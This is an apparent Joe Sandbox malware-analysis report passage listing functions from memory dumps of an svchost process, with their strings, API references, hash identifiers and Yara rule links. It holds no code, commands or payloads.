Function 02FB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 02FB2104
LdrpInitializationFailure, xrefs: 02FB20FA
Process initialization failed with status 0x%08lx, xrefs: 02FB20F3

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 0bb3ebc0fe8e529ca32b59a737093dd099cffa934b596125e9f33be598be8cba
Instruction ID: 61a82ffdcb15a9fd5c4206af214e76496db5581715e18f4e95da52383ed93042
Opcode Fuzzy Hash: 0bb3ebc0fe8e529ca32b59a737093dd099cffa934b596125e9f33be598be8cba
Instruction Fuzzy Hash: F2F0C275A41218ABFB24E64DDC52FDA3769EF40BD4F50006AFB017B685D6B4A900CE91

Function 02F403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02F94D8A

Strings

#%u, xrefs: 02F94D82

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 7144864c3a51b5bf0ef8d000a88a3eeeb7727afd387c6a3a03b45fb79ddcedff
Instruction ID: 1535730bf643b885f111de85902c7eebf24187770f4e0de71cf0338cae801218
Opcode Fuzzy Hash: 7144864c3a51b5bf0ef8d000a88a3eeeb7727afd387c6a3a03b45fb79ddcedff
Instruction Fuzzy Hash: 0E713C71E0014A9FDB05DF98C990BAEBBF9AF08784F144069EA05E7251EB74ED41CB61

Function 02FD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 02FD70C8

Strings

kLsE, xrefs: 02FD70A4

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 9c434bdf9c848bdf357f0de5e24179a5fa7edfc7c411caade2e1359e068ebbe2
Instruction ID: b8e4bfe7c48eee5fe3107dd553b606da11365445165413a3665de8124a6a0eb6
Opcode Fuzzy Hash: 9c434bdf9c848bdf357f0de5e24179a5fa7edfc7c411caade2e1359e068ebbe2
Instruction Fuzzy Hash: 24414B3190335947E731BB65EC48B6ABB96AB10BE8F380219EF505F1C9CBB94485CF90

Function 02F452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 02F45445
@, xrefs: 02F455A3

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 9696411a808d418fd599a454e9f45a17f327d4083b94e1cab4902050202ce3b3
Instruction ID: 09e47399ba10b6e89ef6aca7144707d65e601a7d0969321845872d4496cb8445
Opcode Fuzzy Hash: 9696411a808d418fd599a454e9f45a17f327d4083b94e1cab4902050202ce3b3
Instruction Fuzzy Hash: 6E32D371A083118BDB24EF15C490B3FBBE5EF94788F94491EFA8597290EBB4D844CB52

Function 02FFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 02FFA44B
`, xrefs: 02FFA551

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: b0d463210bc01e4a66d60eb971cf7440bc5ab0e187156b185174a7fbf9909a03
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: DCC1D0326043469BD765CF28C840B2BBBE6BF84798F084A2DFB99CA2A0D775D505CF51

Function 02F30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

ResIdCount less than 2., xrefs: 02F8EEC9
Failed to retrieve service checksum., xrefs: 02F8EE56

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: 91e2d5cf8d02cff157a2e9f96f7cc76f0321b567d21cde27b89f0faa8d12c2d6
Instruction ID: 562d01e55a680bb43edb14cfbcd504efc3ad487065f372a5136dba9b3909cd15
Opcode Fuzzy Hash: 91e2d5cf8d02cff157a2e9f96f7cc76f0321b567d21cde27b89f0faa8d12c2d6
Instruction Fuzzy Hash: C7E1F2B19087849FE325CF15C440BABFBE0FB88754F408A2EE69D9B280DB759509CF56

Function 02FAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 02FAE751
Legacy, xrefs: 02FAE75A

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c6752380e0d8c81cded8c86f54b3a31b50fe56e4794b733d5e3dd42edc48ccbc
Instruction ID: 860a06b1416434b9eb05b5e3cea6e21350d15564821b167630085e0e2adee094
Opcode Fuzzy Hash: c6752380e0d8c81cded8c86f54b3a31b50fe56e4794b733d5e3dd42edc48ccbc
Instruction Fuzzy Hash: 0F613BB2E002189FDB14DFA8C890FAEBBB5FB44784F544079E759EB291D731A940CB50

Function 00401290 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

m, xrefs: 00401376
u, xrefs: 0040145B

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: m$u
API String ID: 0-15960550
Opcode ID: 24238280920286fbec46b247b57b25feb5d17c5fc658d390d65ecef023af23d6
Instruction ID: d269ed94975f6e65e30e228b767ff1b08d022a5e1fd3014996e4aca518962f08
Opcode Fuzzy Hash: 24238280920286fbec46b247b57b25feb5d17c5fc658d390d65ecef023af23d6
Instruction Fuzzy Hash: 0351A171E1030A87CF188E99C8501EEB771EBD4304F14826BE919BF7E0E7789A418B85

Function 02F3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 02F3A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 02F3A309

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: c3cd3b03de78f76e78474b72e7e43cbddf209ffa159984ef88240eade577d355
Instruction ID: 3de49321b9b6cddf1d851b218a015bfa5862d7d1fbade71d0bd545344d7ff3ba
Opcode Fuzzy Hash: c3cd3b03de78f76e78474b72e7e43cbddf209ffa159984ef88240eade577d355
Instruction Fuzzy Hash: 0C41AC31E04649DBDB12CF6AC880BAA77F5FF84784F2440A9EA45DB2A1E776D900CB50

Function 02F6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 02F6330D
.Local\, xrefs: 02F632B5

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 0de79ec5a63e7dc8c4567f42c9f80953255179025bd56ba3c79f7986c4d5511c
Instruction ID: fbece96beb089292426be95d0d7f072e2bc5668726e575c1648a58fad8c0c2fb
Opcode Fuzzy Hash: 0de79ec5a63e7dc8c4567f42c9f80953255179025bd56ba3c79f7986c4d5511c
Instruction Fuzzy Hash: 5C31B3B26083049FD310DF28C985A6BBBE8FBC5B94F44096EFA9583250DB31DD04CB92

Function 02F3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 02F3C8C3, 02F3CA40

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: c1a81a5e1fcab61c71b31dde98a13e656962cb0a90115389de52542746f846d1
Instruction ID: 450f8f6befe6159c156fc4bfebfb5c7093b103eac9b7398ed27b17ab4f3c541f
Opcode Fuzzy Hash: c1a81a5e1fcab61c71b31dde98a13e656962cb0a90115389de52542746f846d1
Instruction Fuzzy Hash: CE824B75E002188BDB26CFA9C980BEDB7B5BF48794F14816AEA59BB250D7309D81CF50

Function 02F82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

P`vRbv, xrefs: 02F8300D, 02F833E4, 02F8343B, 02F834FE, 02F8352E

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: P`vRbv
API String ID: 0-2392986850
Opcode ID: 55bd95a1964b3339e76927143d4eb7b0ae10053eed7879c5c1b62a50002c27e5
Instruction ID: 22cf13222100d1e80e3d7ed2796197b28082fcdd0c1019b584c54b39b2284c8a
Opcode Fuzzy Hash: 55bd95a1964b3339e76927143d4eb7b0ae10053eed7879c5c1b62a50002c27e5
Instruction Fuzzy Hash: 8842F872E0425AAEDF28FF68D8447BDFBB1EF05F94F14809AD641AB2A0D7748941CB50

Function 02F37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef0bc77ac35f273f27871049b8462ab9641df35bb0afd25f16da04f12a6ffc0
Instruction ID: 02ddd35858037dcf4ca437f14585751204905c155fb96847d35400d7967eb547
Opcode Fuzzy Hash: cef0bc77ac35f273f27871049b8462ab9641df35bb0afd25f16da04f12a6ffc0
Instruction Fuzzy Hash: 72A15DB1A08342CFD725EF28C580A2AFBE6BF88394F14496DE68597350D770E945CF92

Function 02F52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 02F53240

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f9cbcdad4f81610c4578c01c386478d084e45aeb071d260a54c0c21ded33f67a
Instruction ID: bb0cff852bcb76180a48bfcaba308d43528ea7c359a9dcfbe5c8eedf166448c9
Opcode Fuzzy Hash: f9cbcdad4f81610c4578c01c386478d084e45aeb071d260a54c0c21ded33f67a
Instruction Fuzzy Hash: D2F1A272A04765CFDB25CF28C480B6ABBE1AF887D8F0449ADEF4997250DB30D945CB52

Function 00416583 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 0041689F

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 5cbc48b54ea371b609452a030b0a1d37460388382ab1de6fbaf1b5ccc30b8585
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 82021FB6E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80

Function 02F32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 02F330D6, 02F33124

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: fc25b0f48deb620c94764421a7c477878ffa35a71a92bed419a4e19f8925db3b
Instruction ID: aaa330eeaf7c450883ef3bfb4d99db6b0ca1cf9424804bea6a4ee5ca7c180d73
Opcode Fuzzy Hash: fc25b0f48deb620c94764421a7c477878ffa35a71a92bed419a4e19f8925db3b
Instruction Fuzzy Hash: 1BF1D271E00218DBDB26DF99DC80ABEB7B1FF88790F5440A9E601AB350D774A841CF91

Function 02F6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6dd735b61eaf181f244bec96af3f89f327abad2b140ee5b3079fb7bf0db7c33
Instruction ID: a4beb30a8a483e2a5f0d9cfb148287fc24492107d923f4d4cddcd2874558b336
Opcode Fuzzy Hash: f6dd735b61eaf181f244bec96af3f89f327abad2b140ee5b3079fb7bf0db7c33
Instruction Fuzzy Hash: F2414FB4D01288DFDB20DFA9D880AAEBBF4FF48744F60426EDA59A7611D7359940CF60

Function 02FBEFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 02FBF05B

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: __aullrem
String ID:
API String ID: 3758378126-0
Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction ID: 4e9a363d6f0a0941461d6945d5e19f16e8fbb48d5b10538eebf362940077e7ad
Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction Fuzzy Hash: 99418072F001199BCF18DFB9CC806AEF7F2FF88754B188239E615E7690D674A9518B80

Function 02F30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 02F30255

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f7914c49a10cbc829eb8880574da1750f9e855cf0fb9b4954fd4b7723633d5a4
Instruction ID: 0f9bcac46cc2932f2a2683557f5bcea1e52efeba691a921cbe918e777d520d63
Opcode Fuzzy Hash: f7914c49a10cbc829eb8880574da1750f9e855cf0fb9b4954fd4b7723633d5a4
Instruction Fuzzy Hash: F9A1E831F082686ADF269A248D41BFEB7A56F457D8F04409EFF86A7281CF74D944CB50

Function 02F6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 02FA67C9

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8588853b3b94b8e8213b5982284917a4c5e4ca29e150571b373346def54ef809
Instruction ID: 8b8c3628c2668735d016f7e4bd4895bacd36ca8fd53dba921cfc659af3c88ea6
Opcode Fuzzy Hash: 8588853b3b94b8e8213b5982284917a4c5e4ca29e150571b373346def54ef809
Instruction Fuzzy Hash: 1A7161B5E0021ACFDF24DF98D5A0AADB7BAFF48784F188129EA05E7240DB719941CF50

Function 00402310 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402326

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 9d00002edd7cd5a33f04607dcf812232269bd0ba9766085afe6166aab33598c2
Instruction ID: 756554e4a8c1c1f60bc8fc47e89c9d41ed47a1f08b1f4e694febef9d94387a4f
Opcode Fuzzy Hash: 9d00002edd7cd5a33f04607dcf812232269bd0ba9766085afe6166aab33598c2
Instruction Fuzzy Hash: C051B571B001058BCB2CCE5DCE9466D73A6EB98305F58817AED19EF3D1E6B8ED118744

Function 02FBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 02FBF867

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: e7f3bdcc438c5c0644e23d0fd89fd12e90ab74bc46a237717586ce1b398d3c9e
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 0B517A72614345AFD7229F55CC40FAAB7E9FF88794F000A29BB8497690DBB4E904CB91

Function 02F4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 02F4E6A4

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: effe3f17870ae637c14caa8f92d6066a4f5e0e0baed552a338a7e4294a89229d
Instruction ID: c2efc40024ced83c203ddd773604ce4ce5fa49eaac96da8892ab55ef6ec75961
Opcode Fuzzy Hash: effe3f17870ae637c14caa8f92d6066a4f5e0e0baed552a338a7e4294a89229d
Instruction Fuzzy Hash: 904182729083159BD710DB748880F6BBBD9BF88798F44092DFB94D7180EBB4D904CB96

Function 02FEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 02FEB28F

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 7c550b3ddff4f5c0ad796305b2697a8a3a608f3b33668932c55c7fb06f8219d6
Instruction ID: 4bc2fdc3cbbb0bdbcf34f6ed2b84de43a7bc996f0774e05e0f4e6330926b0e53
Opcode Fuzzy Hash: 7c550b3ddff4f5c0ad796305b2697a8a3a608f3b33668932c55c7fb06f8219d6
Instruction Fuzzy Hash: 99419376D00219AFDF12DA94CC41BEEB7B9BF44798F050166EB52AB264D770DE40CBA0

Function 02FB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 02FB9870

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 58c759ea13290d6c95453a683c2abedef7bf40070b7954a93fabc1cc51fe9930
Instruction ID: cf930d75ccb3031f0cca1fa1fbd6b6535b00670689143c10cb5fe627f57b0a0a
Opcode Fuzzy Hash: 58c759ea13290d6c95453a683c2abedef7bf40070b7954a93fabc1cc51fe9930
Instruction Fuzzy Hash: 40316171B002019FDB259F6ADC50F66B6E5EF59794F94843EE7099F280E7B1C8808B94

Function 02F35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 02F350BF

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: c27e62b406eccb83ac48e240dfb266a382a7afe6d86e4e6d5d98a7f161e107b7
Instruction ID: 2991f0a9835617fe5b52d92eec8821fe5bba5cedcb67308b87d6bc880a5783ae
Opcode Fuzzy Hash: c27e62b406eccb83ac48e240dfb266a382a7afe6d86e4e6d5d98a7f161e107b7
Instruction Fuzzy Hash: EE11D3B1B086138BEB26591C8850736B2D5EBCDBE8FB4812AE752CB390D773D840C380

Function 02FB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 02FB10F7

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 83f788aeb81070891a69f2c45c05f4529ace7b3e4a77ac7b5a1112b4afa1a992
Instruction ID: ca6a5e09e23822e52b7da3e7260e64974cb1a618fa33c73d93313207d583904a
Opcode Fuzzy Hash: 83f788aeb81070891a69f2c45c05f4529ace7b3e4a77ac7b5a1112b4afa1a992
Instruction Fuzzy Hash: F72134B19083449FD320DF1AD804A9BFBE8EFD5B80F100A1EBA9497250DBB09504CF92

Function 02F6E8F0 Relevance: 1.0, Instructions: 985COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8f60cb6a22e8139e7c6cbf54a54539d4d62d18e3b893120549c3c7a24edef10
Instruction ID: 08758b2b6cd6510f47a1087eb4cd12abbc89cb5d82ac8fb62d028c74b61d8a51
Opcode Fuzzy Hash: c8f60cb6a22e8139e7c6cbf54a54539d4d62d18e3b893120549c3c7a24edef10
Instruction Fuzzy Hash: B1822472F102188BCB58CFADD8916DDB7F2FF88314B19812DE416EB345DA34AC568B45

Function 02F7516C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646d9f784c511f8eae8f8d086a941d205bd7cd3b7a2a355c12dd7bc0ef99687b
Instruction ID: c697beee22763787af8dcef1b18c29dbcc3344865130b90585cf8601c456ba98
Opcode Fuzzy Hash: 646d9f784c511f8eae8f8d086a941d205bd7cd3b7a2a355c12dd7bc0ef99687b
Instruction Fuzzy Hash: 9862CF72D0464AAFCF14CF48D4905AEFB62FE55388B89C65ECD9A27604D331BA58CBD0

Function 02F8739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501197a13f98a657412165d1ff6c36ac06caaafd160c5485bc50c1f86ef59d39
Instruction ID: 4e69978f4ccd2fe5b0038a0b5c5d86ccad90b776446e406894637823571ed2c7
Opcode Fuzzy Hash: 501197a13f98a657412165d1ff6c36ac06caaafd160c5485bc50c1f86ef59d39
Instruction Fuzzy Hash: AB428075E006168FDB14EF59C890BAEF7B2FF88354B248559D652AB350D734E841CF90

Function 02F85AA0 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684

Function 02F5B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657751a6d6d02dfcff502751e7768a42e756448a470d34da733d91c1866c534f
Instruction ID: 6fefdc7d77d2af8fba35a90b1ba4b7eb4930fef4a72bebe3ddfad482f4e93d67
Opcode Fuzzy Hash: 657751a6d6d02dfcff502751e7768a42e756448a470d34da733d91c1866c534f
Instruction Fuzzy Hash: 9C32B472E01229DBCF24DF68D894BAEBBB1FF54798F180029EE05AB345D7359901CB90

Function 02FC8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025570540f4f3195e48e4ae996cfc3a4b6436dd5e668fdf7adbd5f4674421b58
Instruction ID: ab7b839be20f5a6edec12c636f57191dce87e131c66314f9533cd8aafa4a86c4
Opcode Fuzzy Hash: 025570540f4f3195e48e4ae996cfc3a4b6436dd5e668fdf7adbd5f4674421b58
Instruction Fuzzy Hash: 4A425B71E002199FDB25CF69C981BADB7F6BF88384F24809DEA49AB241D7349D85CF50

Function 02F42840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7f0c67fe6a4e023194ba43dfd71565c6772079c2502c0f28530eff152fb745a
Instruction ID: 7cdd340b0fde9267a9c2fb97e3b33ca43b8c15b88babb1dc4f336f1988b030e5
